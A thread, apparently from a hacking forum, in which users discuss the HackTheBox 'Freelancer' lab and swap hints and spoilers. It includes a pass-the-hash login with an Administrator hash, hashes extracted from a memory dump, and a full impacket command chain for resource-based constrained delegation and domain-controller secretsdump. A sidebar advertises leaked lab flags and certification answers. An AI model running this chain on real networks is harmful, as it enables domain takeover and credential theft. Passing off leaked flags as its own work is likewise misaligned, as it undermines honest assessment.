|
HTB - Freelancer
by trevor69000 - Saturday June 1, 2024 at 06:49 PM
|
|
Jun 04, 2024, 10:36 AM
evil-winrm -i x.x.x.x -u Administrator -H 0039318f1e8274633445bce32ad1a290
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Jun 04, 2024, 11:19 AM
Well, secretsdump can work and can not work. Just 20 attempts and I got all hashes. Weird stuff.
Jun 04, 2024, 12:27 PM
Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless
== MSV == Username: liza.kazanof Domain: FREELANCER LM: NA NT: 6bc05d2a5ebf34f5b563ff233199dc5a SHA1: 93eff904639f3b40b0f05f9052c48473ecd2757e Did I miss something
Jun 04, 2024, 07:44 PM
(Jun 04, 2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless I found the password for the user lorra199 for those who struggling to get it check the hive registry in the dump
Jun 05, 2024, 12:01 AM
(Jun 04, 2024, 07:44 PM)standby123 Wrote:(Jun 04, 2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless how do i get the sql terminal to run
Jun 05, 2024, 12:48 PM
(Jun 05, 2024, 12:01 AM)dino434343 Wrote:(Jun 04, 2024, 07:44 PM)standby123 Wrote:(Jun 04, 2024, 12:27 PM)standby123 Wrote: Guys I was able to extract the nt hash for the user liza.kazanof from memory.dmp but it useless you have first to get the admin user via qr code (IDOR)
Jun 05, 2024, 09:43 PM
Awesome machine. Completed the root with impacket, no need to disable AV.
Just use RCBD for AD, add a computer if needed, they have by default SPN.
Jun 06, 2024, 09:59 PM
(This post was last modified: Jun 06, 2024, 10:03 PM by mongocrypt.)
addcomputer.py -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'pass lorra''
sudo rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrador' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.xx.xx.xx-action 'write' 'freelancer.htb/lorra199:pass lorra' sudo rdate -n freelancer.htb && getST.py -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.xx.xx.xx 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!' export KRB5CCNAME='Administrator.ccache' secretsdump.py 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.xx.xx.xx -target-ip 10.xx.xx.xx-just-dc-ntlm evil-winrm -i 10.xx.xx.xx -u 'Administrator' -H <hash>
Jun 07, 2024, 02:10 AM
Show's no error but still got flagged by AMSI
Jun 08, 2024, 12:46 PM
This machine was really fun
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 92 | 8,464 |
4 hours ago Last Post: unionstorm |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 25 | 2,521 |
10 hours ago Last Post: cry_elite |
||
| CBBH Write Ups | 25 | 6,580 |
10 hours ago Last Post: cry_elite |
||
| [FREE] CPTS 12 FLAGS | 84 | 2,922 |
11 hours ago Last Post: justhelpmefly |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 33 | 3,096 |
11 hours ago Last Post: justhelpmefly |
||
